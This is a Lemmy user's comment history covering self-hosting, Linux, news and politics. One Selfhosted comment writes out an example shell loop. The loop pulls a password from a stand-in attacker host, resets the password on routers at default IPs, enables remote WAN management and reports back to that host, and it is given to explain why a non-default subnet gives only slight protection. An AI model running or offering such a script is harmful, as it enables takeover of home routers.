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I’d bet it’s just further self-censoring for fear of being unalived.
But also, don’t think you have to do all the work yourself. I think we very often underestimate the importance of being the one that simply plants the seed. Of course the difficulty is that usually we can’t tell if said seed has actually been planted, so it feels like a waste of energy.
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Selfhosted@lemmy.world•My 15-year old panasonic toughbook is hanging in there as a proxmox serverEnglish
1·11 days agoNo worries. It is technically another layer in the “swiss cheese” model, but it certainly is more holes than cheese. I think it falls into the “can’t hurt, might help” category.
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World News@lemmy.world•Europe has 'maybe 6 weeks of jet fuel left,' energy agency head tells APEnglish
12·11 days agoNames with the same or fewer syllables as “Iran War”:
- Ego War
- Fossil Farce ^(you could take that a couple different ways hehe)
- Epstein War
- F*ck Kids War
- U! S! [eagle screech that sounds like “A!”, except it’s not an eagle it’s a hawk, because eagles don’t screech like that]
- Orange You Glad I Didn’t Say Bananuclear? War
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Selfhosted@lemmy.world•My 15-year old panasonic toughbook is hanging in there as a proxmox serverEnglish
11·11 days agoThat’s what I said though, it only protects you from the very most basic of mindless scripts. Obviously ARP/NDP makes it pointless for anything more complicated than…
newpass="$(curl "https://bad.guy/get_pass_for_pub_ip")" for a in '192.168.1.1' '192.168.0.1' '10.0.0.1'; do curl -q "http://${a}/reset_password.cgi?&password=password&new_password=${newpass}" 2>/dev/null && \ curl -q "http://${a}/remote_management.cgi?&password=${newpass}&wan_enable=1" && \ curl -q "https://bad.guy/success?addr=%24%7Ba%7D" done…completely pointless. If it’s a someone inside your network, you need more.
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Selfhosted@lemmy.world•My 15-year old panasonic toughbook is hanging in there as a proxmox serverEnglish
11·13 days agoUsing a random non-default subnet increases security (slightly, and only through obscurity) by making it harder for a compromised device to perform automated attacks against, most often, your router. Typically they’re pretty simple scripts that just try to hit default ports on default IPs.
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Linux@lemmy.ml•TempleOS won't comply with the new BS age verifcation laws
1·1 month agoWell of course it doesn’t, God does.
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Linux@lemmy.ml•The ‘European’ Jolla Phone Is an Anti-Big-Tech Smartphone
13·1 month agoI mean, postmarketOS supports a pretty decent range, but as far as native Linux phones I’m right with you.
I mean, that’s high praise for a vacuum. I would be more concerned if it didn’t.
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Linux@lemmy.ml•TempleOS won't comply with the new BS age verifcation laws
0·1 month agoIf they actually read the Bible, they would never
let a child near itgo near a child.ftfy
I feel like Linus has a good heart, but I think the constant pressure to be relevant has kinda ruined his personality over the years (at least on camera). I have fond memories of LTT’s videos like 8 years ago, but now they’re overproduced for my taste; they just don’t seem genuine anymore. Same old story as most anyone that makes it big, I know.
It’s weird with a multi-command string (i.e. when semicolons get involved), shortest answer is to fiddle with it. I think it may work at the beginning if you put the rest of the command in a (subshell)?
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News@lemmy.world•Mamdani signs New York executive order targeting ICE
1·2 months agoYeah, I thought of that, but it would be just as easy for someone at the building to be like “I know your boss probably said you can just bust in here, but that’s not how the law works. You still need a warrant.”
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World News@lemmy.world•Trump Reveals He’s Taking $10 Billion From Taxpayers for His New BoardEnglish
1·2 months agoBored of Peace
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News@lemmy.world•Mamdani signs New York executive order targeting ICE
3·2 months agoBut are ICE agents likely to understand even well established legal precedent? This is at the point of being guerrilla legality, it’s about using confusion to create delays for them wherever possible.
Pro tip: you can also put the
< urls.txtat the start for readability. The arrow doesn’t have to point at the command.
To commandeer their superior grammatical sensibilities?
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Games@lemmy.world•Timberborn - 1.0 release date and lore trailerEnglish
7·3 months agoDo I have enough ___ stockpiled? No. Hoard more. Rinse and repeat.


…and you pay more for other distros?